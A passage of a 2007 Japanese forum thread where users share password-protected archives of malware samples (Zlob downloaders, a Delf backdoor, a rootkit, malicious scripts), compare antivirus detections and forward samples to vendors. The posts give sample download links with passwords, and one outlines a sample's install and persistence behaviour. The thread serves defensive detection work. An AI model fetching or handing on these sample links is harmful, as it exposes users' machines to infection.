Virus Analyst, Kaspersky Lab.


場合によっては複数の人間で精査してるよ
あ これ Thu, 09 Aug 2007 04:59:48

最終ジャッジはミユキちゃんみたいだけど・・・

501 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:44:28
>>496>>500は正反対だ。

           ___   ━┓
         / ―  \  ┏┛
        /  (●)  \ヽ ・
       /   (⌒  (●) /
       /      ̄ヽ__) /  
.    /´     ___/
    |        \
    |        |



502 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:49:07
>>498
たぶん無害。アプレット(class)見たけど音と熊の絵しか無い。

503 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:52:54
>>498のバイナリ

ttp://www5.uploader.jp/dl/tane/tane_uljp00095.zip.html
pass: NoisyBear

McAfeeには一応送った

504 :名無しさん@お腹いっぱい。:2007/08/09(木) 19:58:59
いわゆるジョークソフトってやつか

McAfeeの提出お願いしますの人は
ストライクゾーンを微妙にはずしたのばかり持ってくるなw

505 :500:2007/08/09(木) 20:18:10
>>501
今の定義ファイルではどっちも白判定だよ

やっぱライセンス料支払うだけの価値あるよ

506 :名無しさん@お腹いっぱい。:2007/08/09(木) 20:19:30
てか 送り甲斐があるw

507 :名無しさん@お腹いっぱい。:2007/08/09(木) 20:36:49
>>498
カスペルスキーより返答。
Hello,
NoisyBear.class
No malicious code was found in this file.

508 :名無しさん@お腹いっぱい。:2007/08/09(木) 20:45:44
ウイルスキラーより返答

Fuck!!!!
This file is no virus!!!!!
your mother fucker!!!!!!!!!!!!!!!!!

509 :名無しさん@お腹いっぱい。:2007/08/09(木) 20:46:34
ねーよw

510 :名無しさん@お腹いっぱい。:2007/08/09(木) 20:54:11
しかもYour mother fucker
wwwwwww

英語として文章になってないしwwww

511 :名無しさん@お腹いっぱい。:2007/08/09(木) 21:03:11
↑Asshole

512 :名無しさん@お腹いっぱい。:2007/08/09(木) 21:38:05
カスペwikiにもあるけど…雛型

宛先 newvirus@kaspersky.com
件名 A New Malware? Please inspect the attached file.

本文 Attachment: ???.rar とか ???.zip
    password ???

検体ファイルはパス付の圧縮で・・・・プロバイダで弾かれる恐れがあるから
たった四行 本文二行w

513 :名無しさん@お腹いっぱい。:2007/08/09(木) 21:53:16
3行バージョン出来た おまけに添付ファイル無しw

宛先 newvirus@kaspersky.com
件名 A New Malware? Please inspect the compression file in the thread.

本文 http://pc11.2ch.net/test/read.cgi/sec/1181834645/

514 :名無しさん@お腹いっぱい。:2007/08/09(木) 23:10:27
面倒な事やってるな。
俺は、隔離フォルダに手動で追加して、右クリック−送信で終わりだけどな。
シグネチャ更新されたら、勝手に隔離フォルダの再スキャンやって、削除してくれるし。

515 :名無しさん@お腹いっぱい。:2007/08/09(木) 23:18:26
送信部主任現る

516 :名無しさん@お腹いっぱい。:2007/08/10(金) 10:49:25
ttp://www5.uploader.jp/dl/tane/tane_uljp00096.zip.html
pass: VideoAccessControl

McAfee未対応につき送ってきます

517 :名無しさん@お腹いっぱい。:2007/08/10(金) 10:58:47
>>516
解凍できなくね?

518 :名無しさん@お腹いっぱい。:2007/08/10(金) 11:01:07
それ本当に有害なコードなのか?
最近のやり取りで、McAfeeと書いてあると
また無害なんじゃないかと思うようになってきた。

519 :名無しさん@お腹いっぱい。:2007/08/10(金) 11:26:44
>>517
今手元で試したらいけましたよ?

>>518
むぅ、あれと一緒にされるのは心外だ
とりあえずVirusTotalだとBitDefenderがTrojan.Downloader.Zlob.AAGRとして検出する

520 :名無しさん@お腹いっぱい。:2007/08/10(金) 11:49:48
>>516
Avira AntiVir

未検出のため検体提出しました

521 :名無しさん@お腹いっぱい。:2007/08/10(金) 13:37:24
>>518-519

         ___
        /       ヽ
    , -‐ (_).⌒ l ̄| ⌒ | プギャーーー
     l_j_j_j と) ノ─|  ノ
    /   /       ヽ
    〈  ノ         |

522 :名無しさん@お腹いっぱい。:2007/08/10(金) 14:06:19
>>519 >>488 でもBitDefenderは誤検知してるからなぁ。

523 :名無しさん@お腹いっぱい。:2007/08/10(金) 16:03:30
カスペまだー?(・∀・ )っ/凵 ⌒☆チン チン

524 :名無しさん@お腹いっぱい。:2007/08/10(金) 16:16:43
>>523
呼ぶな!www

>>516
カスペ7
検出せず、

様子見モードでいいか?



525 :名無しさん@お腹いっぱい。:2007/08/10(金) 16:52:00
>>516
Risingに提出しました

526 :名無しさん@お腹いっぱい。:2007/08/10(金) 19:27:42
カスペ2号到着

検出せず
もうちょっとハンデあげようか?

527 :名無しさん@お腹いっぱい。:2007/08/10(金) 19:34:43
よくわからんがKasperskyには提出済みだったりする@部外者

528 :名無しさん@お腹いっぱい。:2007/08/10(金) 19:55:55

>>396

529 :名無しさん@お腹いっぱい。:2007/08/10(金) 20:19:19
http://www11.axfc.net/uploader/20/so/N20_24889.zip.html
vip

530 :名無しさん@お腹いっぱい。:2007/08/10(金) 20:21:56
>>516

aviraの提出フォームから送ったら速攻結果でた。 黒判定。
http://analysis.avira.com/samples/finish.php

531 :516:2007/08/10(金) 20:45:10
リンク先 変だったなw
http://www5.uploader.jp/dl/tane/tane_uljp00097.jpg.html

532 :531=530≠516:2007/08/10(金) 20:48:50
名前欄間違い スマソ

533 :名無しさん@お腹いっぱい。:2007/08/10(金) 21:32:28
>516
AntiVirusKit 2007未検出
提出お願いします´・ω・`)y━ o

534 :名無しさん@お腹いっぱい。:2007/08/10(金) 21:51:06
>>516
Hello,

VideoAccessCodecInstall.exe,
VideoAccessCodecInstall.exe - Trojan-Downloader.Win32.Zlob.byl

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

Please quote all when answering.


片方か両方かわからんのー

535 :名無しさん@お腹いっぱい。:2007/08/10(金) 21:56:20
>>516
Risingの結果
   1.文件名:VideoAccessCodecInstall.exe
   不是病毒
   2.文件名:VideoAccessCodecInstall.exe
   不是病毒

536 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:09:42
>>535

「不是病毒」って、いうのは、This is not a virus.

( ̄□ ̄;)!!

537 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:18:59
>>535
さすがキラーwww
その時点で誤判定かwww

538 :名無しさん@お腹いっぱい。:2007/08/10(金) 22:23:30
508 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/08/09(木) 20:45:44
ウイルスキラーより返答

Fuck!!!!
This file is no virus!!!!!
your mother fucker!!!!!!!!!!!!!!!!!

539 :名無しさん@お腹いっぱい。:2007/08/10(金) 23:18:37
こんにちは

両方ともブラックにしました。

みゆき

540 :名無しさん@お腹いっぱい。:2007/08/11(土) 10:20:51
>>534
検出名からしてカスペ?

541 :名無しさん@お腹いっぱい。:2007/08/11(土) 12:36:01
Hello,
うんぬん
Please quote all when answering.

カスペ返信だよ

542 :名無しさん@お腹いっぱい。:2007/08/12(日) 12:55:02
自演乙

543 :名無しさん@お腹いっぱい。:2007/08/12(日) 15:23:42
???

544 :名無しさん@お腹いっぱい。:2007/08/14(火) 11:35:22
げげ。
Active Virus Shield もう使えないじゃん。
何とマカフィーになっちまった。

Avira に移行するかー。

545 :544:2007/08/14(火) 11:35:59
あ、スレ間違えた。
すまん。

546 :名無しさん@お腹いっぱい。:2007/08/14(火) 18:29:45
ttp://www5.uploader.jp/dl/tane/tane_uljp00099.zip.html
pass: VideoAccessCodecInstall

McAfeeには提出済み

547 :名無しさん@お腹いっぱい。:2007/08/14(火) 19:25:41
>>546
AVG
スルーしたんで検体送りました

548 :名無しさん@お腹いっぱい。:2007/08/14(火) 20:12:06
>>546
カスペ7。

華麗にスルーしましたので、これから検体送ります。

archive NSISって何?


549 :名無しさん@お腹いっぱい。:2007/08/14(火) 20:22:18
>>546
乙です
Norton Internet Security 2007 未検知なんで贈りました


550 :名無しさん@お腹いっぱい。:2007/08/14(火) 21:04:46
>>546
おち

AntiVirPersonalClassicで未検出、おくりますた

AntiVir ttp://www.avira.com/en/support/submit_suspicious_files.html
ここから、zipにしたファイルをうpすればいいんだよね?
初めてだからよくわからなかった

551 :548:2007/08/14(火) 21:27:04
カスペから返事キタ━━━━━━(゜∀゜)━━━━━━ !!。
4つとも、Zlobだって。アップデート待ち。

From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Tuesday, August 14, 2007 9:18 PM
Subject: RE: Please Inspect this file? A New Virus? [KLAB-2665002]


Hello.

New malicious software was found in the attached file.
V:\viruslib\Infected\TrojWare\Trojan-Downloader\Win32\Zlob\bzg
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Roman Gavrilchenko
Virus Analyst, Kaspersky Lab.



552 :550:2007/08/14(火) 21:47:55
21:02にメールきた

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number:

We received the following archive files:

File ID Filename Size (Byte) Result
1254617 VideoAccess.zip 386.7 KB OK

A listing of files contained inside archives alongside their results can be found below:
File ID Filename Size (Byte) Result
1254618 VideoAccessCodecI...ll.exe 110.29 KB MALWARE(ry

The file 'VideoAccessCodecInstall.exe' has been determined to be 'MALWARE'.
Our analysts discovered that the file is a Trojan.
In general this kind of programs contains harmful functionality called payload.
Detection will be added to our virus definition file (VDF) with one of the next updates.

553 :名無しさん@お腹いっぱい。:2007/08/14(火) 22:03:00
Please Inspect this file? ←ハテナ取ろうぜ なんかプリーズが動詞っぽく見える(^^;
なんにせよ 乙

554 :名無しさん@お腹いっぱい。:2007/08/14(火) 22:29:33
>>546
ウイルスバスター2007
4.652.05(CPR)にてTROJ_ZLOB.DOT対応済み

555 :名無しさん@お腹いっぱい。:2007/08/14(火) 22:53:01
>>548
>>551
GJ

>>552
GJ

556 :名無しさん@お腹いっぱい。:2007/08/14(火) 23:14:02
カス自演乙

557 :名無しさん@お腹いっぱい。:2007/08/14(火) 23:22:15
送ってみればわかること

カス4個検出

558 :名無しさん@お腹いっぱい。:2007/08/15(水) 01:28:33
>>546
http://www.virustotal.com/resultado.html?1196669c7e1e67d50ea7d786e5193783
File VideoAccessCodecInstall.exe received on 08.14.2007 18:18:32 (CET)
AhnLab-V3 2007.8.9.2 2007.08.13 -
AntiVir 7.4.1.62 2007.08.14 -
Authentium 4.93.8 2007.08.13 -
Avast 4.7.1029.0 2007.08.13 -
AVG 7.5.0.476 2007.08.13 -
BitDefender 7.2 2007.08.14 -
CAT-QuickHeal 9.00 2007.08.14 -
ClamAV 0.91 2007.08.14 Trojan.Dropper-2102
DrWeb 4.33 2007.08.14 -
eSafe 7.0.15.0 2007.08.10 -
eTrust-Vet 31.1.5058 2007.08.14 -
Ewido 4.0 2007.08.14 -
FileAdvisor 1 2007.08.14 -
Fortinet 2.91.0.0 2007.08.14 -
F-Prot 4.3.2.48 2007.08.13 -
F-Secure 6.70.13030.0 2007.08.14 -
Ikarus T3.1.1.12 2007.08.14 -
Kaspersky 4.0.2.24 2007.08.14 Trojan-Downloader.Win32.Zlob.bzg
McAfee 5097 2007.08.14 -
Microsoft 1.2704 2007.08.14 -
NOD32v2 2460 2007.08.14 -
Norman 5.80.02 2007.08.14 -
Panda 9.0.0.4 2007.08.14 -
Prevx1 V2 2007.08.14 -
Rising 19.36.12.00 2007.08.14 -
Sophos 4.20.0 2007.08.12 -Sunbelt 2.2.907.0 2007.08.14 -
Symantec 10 2007.08.14 -
TheHacker 6.1.8.168 2007.08.14 - VBA32 3.12.2.2 2007.08.13 - VirusBuster 4.3.26:9 2007.08.14 -
Webwasher-Gateway 6.0.1 2007.08.14 -

559 :名無しさん@お腹いっぱい。:2007/08/15(水) 01:45:18
【柔道】谷亮子が股を開いて上下運動…子育てとの両立「タニーズブートキャンプ」で挑む(動画有)
http://news21.2ch.net/test/read.cgi/mnewsplus/1187108453/

1 名前:(´・ω・`)@知らんがなφ ★[sage] 投稿日:2007/08/15(水) 01:20:53 ID:???0
北京オリンピックまであと1年。
谷亮子選手(31)は、「田村で金」、「谷で金」、「母でも金」と、
自らに試練を課しています。谷選手は、子育てと柔道の両立という課題に、
独自のトレーニング「タニーズブートキャンプ」で挑んでいます。

赤ちゃんを抱えてのスクワットや赤ちゃんを足に乗せての足上げ腹筋などを行っているようです。

http://headlines.yahoo.co.jp/videonews/fnn/20070814/20070814-00000272-fnn-loc_all.html

[動画(一部規制有)]
http://www.fnn-news.com/windowsmedia/sn2007081411_300.asx


検体提出よろ。

560 :名無しさん@お腹いっぱい。:2007/08/15(水) 13:35:08
>>558
VirusTotal便利だね〜
このスレの存在意義が薄れそうだw

561 :名無しさん@お腹いっぱい。:2007/08/15(水) 13:42:01


NODのスルーっぷりは神




562 :名無しさん@お腹いっぱい。:2007/08/15(水) 13:57:30
スルーして全然平気な程度の糞ウィルスだから当然かな?

563 :名無しさん@お腹いっぱい。:2007/08/15(水) 14:13:06
>>562
つ ダウンローダー

564 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:00:11
問題ない

565 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:01:27
ダウンローダーは元々ウィルスじゃないしな

566 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:06:14
<丶`∀´> ババアの痰の入ったキムチも健康上全く問題ないニダ。

567 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:18:00
だな。

568 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:48:30
ダウンローダーはダウン元を潰されればそれで終わり、潰されなくてもダウンロード時に検出するから無害に等しい。

569 :名無しさん@お腹いっぱい。:2007/08/15(水) 15:54:19
           ∩_
           〈〈〈 ヽ
          〈⊃  }
   ∩___∩  |   |
   | ノ      ヽ !   !
  /  ●   ● |  /
  |    ( _●_)  ミ/ こいつ最高にアホ
 彡、   |∪|  /
/ __  ヽノ /
(___)   /


570 :名無しさん@お腹いっぱい。:2007/08/16(木) 02:30:14
>569
ttp://www.free-codecs.com/download_soft.php?d=3213&s=344

571 :名無しさん@お腹いっぱい。:2007/08/16(木) 14:34:22
>>546
Risingは不是病毒でした

572 :名無しさん@お腹いっぱい。:2007/08/16(木) 17:08:57
>>558
Clamって検出率低いのに、妙に対応が早い時があるな。
不思議なAVだ。

573 :名無しさん@お腹いっぱい。:2007/08/16(木) 17:21:05
Clamは検体出すのに1人1日何件みたいな制限があった気がする

574 :名無しさん@お腹いっぱい。:2007/08/16(木) 20:23:30
目もくらむほどの検出率だ!。ナンチテ。

575 :名無しさん@お腹いっぱい。:2007/08/16(木) 20:27:13
>>574
[ー。ー]っ<<´w`)

576 :名無しさん@お腹いっぱい。:2007/08/18(土) 13:50:54
ttp://netgametools.up.seesaa.net/image/HyperOlly209.zip

577 :名無しさん@お腹いっぱい。:2007/08/18(土) 13:53:08
Rootkitってでたー

578 :名無しさん@お腹いっぱい。:2007/08/18(土) 13:59:27
>>576
キラー
D:\virus\HyperOlly209.zip>>GRAPP.exe
Trojan.Win32.Agent.fwe
D:\virus\HyperOlly209.zip>>GR.sys
RootKit.Agent.ri

579 :名無しさん@お腹いっぱい。:2007/08/18(土) 14:11:23
>>576
McAfee
GR.sys : Generic.ep

exeのほうは空振りにつき送りまつ

580 :名無しさん@お腹いっぱい。:2007/08/18(土) 14:21:01
ttp://www.box.net/index.php?rm=box_download_shared_file&file_id=f_84907227&shared_name=zer2m3l83u

581 :名無しさん@お腹いっぱい。:2007/08/18(土) 15:44:58
こちらが本スレだと思うが、最近は、↓でも検出可否やっているようだ。

【信者】検出可否報告スレ3【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1181836779/

582 :名無しさん@お腹いっぱい。:2007/08/18(土) 15:49:46
>>576d。

カスペ7

detected: Trojan program Rootkit.Win32.Agent.eh File: C:\Users\***\Desktop\HyperOlly209.zip/GR.sys

exeの方はスルー。検体提出します。






583 :名無しさん@お腹いっぱい。:2007/08/18(土) 16:40:50
>>576
Norton Internet Security 2007
GRをTrojan Horse として検知
未検知なのは贈りました

584 :名無しさん@お腹いっぱい。:2007/08/18(土) 17:22:30
>>576
AVG
GR.sys
Trojan horse BackDoor.Generic6.ISU

あとは検体送りました

585 :名無しさん@お腹いっぱい。:2007/08/18(土) 18:39:22
>>576
ウイルスバスター 2007
GR.sysをPE_Genericで検出。
残りは送信しました

586 :名無しさん@お腹いっぱい。:2007/08/18(土) 21:14:25
>>576
Avira AntiVir PersonalEdition Classic

--> GRAPP.exe
[DETECTION] Is the Trojan horse TR/Agent.FWE
--> GR.sys
[DETECTION] Is the Trojan horse TR/Rkproc.BH

587 :名無しさん@お腹いっぱい。:2007/08/18(土) 21:29:53
>>576
セキュリティ24(カスペ)で
GR.sys が 不明のウィルス として検出された。

588 :名無しさん@お腹いっぱい。:2007/08/18(土) 22:16:10
>>576はセキュリティソフトは何使ってるの?

589 :名無しさん@お腹いっぱい。:2007/08/18(土) 23:28:30
>>585
VirusTotalだと出てないよ
どうして?

やっぱりバスターみたいなアマチュアソフトは論外なのかな?

590 :名無しさん@お腹いっぱい。:2007/08/19(日) 00:04:51
>>589
(こっそり小声で)

VirusBusterとウイルスバスターは似ているけれど、違うんだ。
ウイルスバスターは、海外では、TrendMicro PC-Cillinで、VirusTotalに参加していない。
VirusBusterは、ハンガリー製のAV.

「VirusBursters(ウイルスバースターズ)」という詐欺ソフト(WinAntiVirusの仲間)もある。w



591 :名無しさん@お腹いっぱい。::2007/08/19(日) 02:00:05
>>590
バスターの俺はどうしたら・・・orz
エロ動画見たさにVideoAccessCodecInstall.exeってのをインストールしてしまった・・・
バスターの検査じゃ何も出なかったからつい・・・>>589とは別の人です

File VideoAccessCodecInstall.exe received on 08.18.2007 18:48:00 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED


Result: 2/32 (6.25%)

Antivirus Version Last Update Result
AhnLab-V3 2007.8.18.0 2007.08.18 -
AntiVir 7.4.1.62 2007.08.18 TR/DNSChanger.CA.9
Webwasher-Gateway 6.0.1 2007.08.18 Trojan.DNSChanger.CA.9

592 :名無しさん@お腹いっぱい。:2007/08/19(日) 02:38:53
>>591
インストールしたらオンラインスキャンで感染しているかどうか確認して、駆除してくれるサイトを探すのが一番かと。

無償オンラインスキャン|ウィルスチェック Part.2
http://pc11.2ch.net/test/read.cgi/sec/1177784260/

593 :591:2007/08/19(日) 08:03:50
>>592
寝る前にシマンテックのオンラインスキャンで試しましたがウィルス検出されず・・・
しかし確実にウィルスかアドウェアが入ってるようです。
デスクの壁紙がリンクのある赤いバイオハザードマークに変えられてました。
それと勝手にIEが多重で開いていたり、スパイウェアアラートとか言う英語の]警告窓が出てたり・・・
消しても消しても消えないという・・・

594 :名無しさん@お腹いっぱい。:2007/08/19(日) 08:25:32
アダ被行った方がよさげ
http://wiki.higaitaisaku.com/wiki.cgi?page=Trojan.Zlob%B7%CF%B4%B6%C0%F7%A4%CE%C2%D0%BD%E8%CB%A1

595 :名無しさん@お腹いっぱい。:2007/08/19(日) 11:46:51
591のと同種と思われるブツ

ttp://www5.uploader.jp/dl/tane/tane_uljp00103.zip.html
pass: VideoAccessCodec

McAfeeには提出済み
未対応のとこに送ってくらさい

596 :名無しさん@お腹いっぱい。:2007/08/19(日) 13:56:16
>>595
カスペ 6
Trojan-Downloader.Win32.Zlob.byl - \0\VideoAccessCodecInstall.exe//stream//data0003
Trojan-Downloader.Win32.Zlob.byl - \1\VideoAccessCodecInstall.exe//stream//data0003
Trojan-Downloader.Win32.Zlob.byl - \2\VideoAccessCodecInstall.exe//stream//data0003
Trojan-Downloader.Win32.Zlob.byl - \3\VideoAccessCodecInstall.exe//stream//data0003
Trojan-Downloader.Win32.Zlob.byl - \4\VideoAccessCodecInstall.exe//stream//data0003

597 :名無しさん@お腹いっぱい。:2007/08/19(日) 14:26:59
nifty常時安全セキュリティ24のカスペでは無反応

ほんとにカスペエンジン積んでんのか不良品!

598 :597:2007/08/19(日) 14:29:59
手動スキャンしたら全部「不明なウィルス」扱いで検出されますた。
ニフティ様ごめんなさい。

リアルタイムスキャン、有効にしてるのになぁ(´・ω・`)

599 :597:2007/08/19(日) 14:36:15
ウィルス名、ちゃんと見てなかった(´・ω・`)
5つ検出されて、すべてTrojan-Downoader.Win32.Zlob.bylですた(´・ω・`)
首釣ってきます(´・ω:;.:...

600 :591:2007/08/19(日) 14:53:42
>>594
感謝
SmitfraudFixで直ったっぽいです。
まだ残ってる可能性もありそうですが
バスターより全然頼りになりました。

601 :名無しさん@お腹いっぱい。:2007/08/19(日) 15:44:32
>>595
ウイルスバスター 2007(4.658.18 CPR)
全ファイルTROJ_ZLOB.DOTで検出。

CPRパターンの更新履歴にTROJ_ZLOB.DOTのシグネチャ修正が入ってるのでそのせいかも

602 :名無しさん@お腹いっぱい。:2007/08/19(日) 18:58:45
>>595
Norton Internet Security 2007
解凍後もすべてAuto Protectに反応無し
贈りました

603 :名無しさん@お腹いっぱい。:2007/08/19(日) 22:38:53
>595さん乙です!!!!!
avast! 未検出の為
提出しました。


604 :名無しさん@お腹いっぱい。:2007/08/20(月) 06:34:14
セキュリティ板@削除議論・自治スレッド
http://qb5.2ch.net/test/read.cgi/sakud/1090504381/

強制IDや強制リモホ表示の是非について投票募ってます。
あるい程度意見溜まったら申請出しますのでご協力お願いします。
コピペで失礼しました。m(__)m

605 :名無しさん@お腹いっぱい。:2007/08/20(月) 06:57:46
http://game11.2ch.net/mmosaloon/
あたりでチートツールの安全性を
ここの住民に確認させている奴がいるようなのでご注意を。

606 :名無しさん@お腹いっぱい。:2007/08/20(月) 15:44:41


●ハイブリッド型のマルウェアはNOD32などでは検出できない●
http://pc11.2ch.net/test/read.cgi/pcnews/1098350729/443




607 :591:2007/08/20(月) 20:11:30
VirusTotalで検出されたTR/DNSChanger.CA.9をバスターに提出
TROJ_ZLOB.DOTで検出されるようになりました。


608 :591:2007/08/20(月) 20:14:30
って・・・2006じゃダメなのか・・・毎日アップデートしてたのに・・・orz

609 :601:2007/08/20(月) 22:55:58
>>608
とりあえずおちけつ
漏れが使ったのはβ版のパターンで、自動更新ではアップデートされないタイプ。
通常はCPRを出してしばらくしてから正式リリースになる。
それで591氏と漏れの検知タイムラグがあったのではないかと。
ちなみに、TrendMicroはウイルスパターンは全共通のはずなので2006/2007とは関係ない。

610 :591:2007/08/21(火) 22:46:52
>>601.609
そうなんですか〜知らなかったのでガッカリしてました。
とりあえずバスター信用してても大丈夫ですかね・・・他スレだとえらい事になってますが・・・orz

611 :名無しさん@お腹いっぱい。:2007/08/22(水) 21:18:16
やべ俺も591と同じ現象。
いじくってみたらEXPLORER.EXEが改変されてたから直したんだがデスクトップの壁紙とタスクトレイアイコンアイコン以外直らねえ・・・OTL。

612 :名無しさん@お腹いっぱい。:2007/08/23(木) 03:35:26
http://www5.uploader.jp/dl/tane/tane_uljp00105.zip.html

このEXE、何で圧縮されるか不明(´Д`;)
windowsフォルダにSVCHOST.EXE が作られるから、間違いなくVirusなんだが


613 :名無しさん@お腹いっぱい。:2007/08/23(木) 03:40:49
>>612
パスワードがわかんね。

614 :名無しさん@お腹いっぱい。:2007/08/23(木) 03:41:26
>612
アホ

615 :名無しさん@お腹いっぱい。:2007/08/23(木) 03:42:07
>612
お前もうくんな

616 :名無しさん@お腹いっぱい。:2007/08/23(木) 06:52:52
「svchost.exe」の正体を探る

http://gigazine.net/index.php?/news/comments/20061009_svchost/

617 :名無しさん@お腹いっぱい。:2007/08/23(木) 11:24:08
http://www5.uploader.jp/dl/tane/tane_uljp00105.zip.html
pass=infected

618 :名無しさん@お腹いっぱい。:2007/08/23(木) 12:42:01
>>617
カスペ7
1ファイル中1体検出(バックドア)

detected: Trojan program Backdoor.Win32.Delf.afu File: C:\Users\***\Desktop\tane_uljp00105.zip/041E1383.exe

Backdoor.Delfの説明(シマンテック)
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2003-050207-0707-99&tabid=2

619 :名無しさん@お腹いっぱい。:2007/08/23(木) 12:51:23
Packer使ってないじゃんね。
たぶん串として常駐して、WGA繋ぎに行く時に
wgacheck■com でプロダクトIDを盗んでから
転送とかその手の奴。

620 :名無しさん@お腹いっぱい。:2007/08/23(木) 12:54:59
>>617
McAfeeに提出した
どーせ返事はこねぇけどな(´・ω・`)

621 :名無しさん@お腹いっぱい。:2007/08/23(木) 13:42:46
>>617
Risingに送った

622 :名無しさん@お腹いっぱい。:2007/08/23(木) 13:46:39
当然の如くNODも無反応だが面倒くさいので送ってない

623 :名無しさん@お腹いっぱい。:2007/08/23(木) 14:03:02
>>617
カスペ6
上に出てるので省略

624 :名無しさん@お腹いっぱい。:2007/08/23(木) 14:08:58
んなへなちょこバックドアを検出しても嬉しくねぇなw

625 :621:2007/08/23(木) 14:25:14
   1.文件名:041E1383.exe
   病毒名:Backdoor.Win32.Agent.co

626 :名無しさん@お腹いっぱい。:2007/08/23(木) 14:41:16
>>624
検出しても嬉しくはないが、検出できないと悔しいねえw

627 :名無しさん@お腹いっぱい。:2007/08/23(木) 14:49:30
いや全然悔しくねぇ、ムダなシグネチャ発行を控えてくれてる方がずっと嬉しい。

628 :531=530≠516:2007/08/23(木) 15:00:34
いや全然嬉しくねぇ、ムダなレスを控えてくれてる方がずっと嬉しい。

629 :名無しさん@お腹いっぱい。:2007/08/23(木) 15:23:55
可否スレで無駄レスしながらなに吠えてんだよw

630 :名無しさん@お腹いっぱい。:2007/08/23(木) 15:25:49
なんだその531=530≠516ってのは

631 :名無しさん@お腹いっぱい。:2007/08/23(木) 15:45:13
>>627
悔しさが滲み出たレスだな。発行数の話じゃねえし、検出できるか出来ないの話ですから。
アンチウイルスがウイルスを検出しない事実が嬉しいとかもうキチガイの域。

632 :名無しさん@お腹いっぱい。:2007/08/23(木) 16:13:57
でもそんなの関係ねえ!

633 :名無しさん@お腹いっぱい。:2007/08/23(木) 19:24:56
Win32/Yossy/op.ap

634 :名無しさん@お腹いっぱい。:2007/08/23(木) 19:45:16
>>617
Avira 未検出

635 :名無しさん@お腹いっぱい。:2007/08/23(木) 20:20:48
>>617
Norton Internet Security 2007
反応無しなんで
贈りました

636 :名無しさん@お腹いっぱい。:2007/08/23(木) 20:47:40
>>617
AVGスルー
提出しますた。

637 :名無しさん@お腹いっぱい。:2007/08/23(木) 22:45:20
>>617
バスター2007
検出しないので提出

638 :名無しさん@お腹いっぱい。:2007/08/23(木) 22:47:16
>>617
avast! 4 Home Editionスルー
検出しました。

639 :638:2007/08/23(木) 22:49:13

検出しました。 X

提出しました。 ○

ごめん。

640 :名無しさん@お腹いっぱい。:2007/08/24(金) 00:30:12
Avira AntiVir PersonalEdition Classic

対応した

--> tane_uljp00105/041E1383.exe
[DETECTION] Contains a signature of the (dangerous) backdoor program BDS/Delf.afu.21 Backdoor server programs

641 :名無しさん@お腹いっぱい。:2007/08/24(金) 10:39:35
http://www5.uploader.jp/dl/tane/tane_uljp00106.zip.html
(pass=infected)

exeを実行し、「Brouse(参照)」を押してフォルダを指定し、「Install」を
押すと、マルウェア発動。
%WinDir%system32、Program Filesへ感染、
レジストリのRun項目、サービスなどへ登録

NOD32、AVG、Avest、Microsoft OneCare等で確認よろしくです。

642 :名無しさん@お腹いっぱい。:2007/08/24(金) 19:06:41
>>641
呼ばれてないけどMcAfee
Generic PUP.h

643 :名無しさん@お腹いっぱい。:2007/08/24(金) 20:42:32
>>641
Avira AntiVir PersonalEdition Classic

--> TamoSoft.CommView.for.WiFi.v4.2.360.Multilangual.Cracked-SSG.exe
[DETECTION] Contains signature of the dropper DR/MediaInject.A.1

644 :名無しさん@お腹いっぱい。:2007/08/24(金) 22:14:36
>>641
ウイルスバスター2007
TROJ_Genericで検出のみ。
とりあえず提出

645 :名無しさん@お腹いっぱい。:2007/08/24(金) 23:40:50
>641
お疲れ様です!!!!!。

avast! Antivirus Home未検出でした。
 提出しました。

646 :名無しさん@お腹いっぱい。:2007/08/25(土) 11:58:36
ttp://www5.uploader.jp/dl/tane/tane_uljp00110.zip.html
pass: script

McAfeeには提出済み
全部スクリプトなんだけど、ここってスクリプトもあり?

647 :名無しさん@お腹いっぱい。:2007/08/25(土) 14:35:56
>>646
d。
カスペ7

detected: malware DoS.JS.Dframe.n File: C:\Users\*\Desktop\tane_uljp00110\Script\0\page.htm
detected: Trojan program Trojan-Downloader.JS.Psyme.li File: C:\Users\*\Desktop\tane_uljp00110\Script\9\sys614.js//JSPack

10個あるフォルダのうち、0と9のみ検出。後はスルー、
残りの8つは、一応検出しとっか。
判断はベンダーによりすごく分かれそうな気もするが・・・。(白黒つけがたい?)

648 :名無しさん@お腹いっぱい。:2007/08/25(土) 19:38:46
>>647
GJ

649 :647:2007/08/25(土) 19:48:58
RE: Please Inspect this file. A New Malware(Script)? [KLAB-2774799]
2007/08/25 (土) 18:06

Hello.
New malicious software was found in the attached files.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com http://www.viruslist.com


カスペルから返事キタ━━━━━━(゜∀゜)━━━━━━ !!

新しいのが見つかったので、シグネチャーに加えるみたいだ。
ただ、8つともまとめて送ったのででどれが白で、どれが黒かはこの3行ではわからん。orz

650 :647:2007/08/25(土) 20:01:36
>>646
カスペ7では、結局、10/10

detected: malware DoS.JS.Dframe.n File: tane_uljp00110.zip/Script/0/page.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nb File: tane_uljp00110.zip/Script/1/ind.html
detected: Trojan program Trojan-Clicker.HTML.IFrame.ae File: tane_uljp00110.zip/Script/2/stats.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nc File: tane_uljp00110.zip/Script/3/sys614.js
detected: Trojan program Trojan-Downloader.JS.Psyme.kg File: tane_uljp00110.zip/Script/4/vip.htm
detected: Trojan program Trojan-Downloader.JS.Agent.nd File: tane_uljp00110.zip/Script/5/iexp.htm
detected: Trojan program Trojan-Downloader.JS.Agent.id File: tane_uljp00110.zip/Script/6/haha.js//JSPack
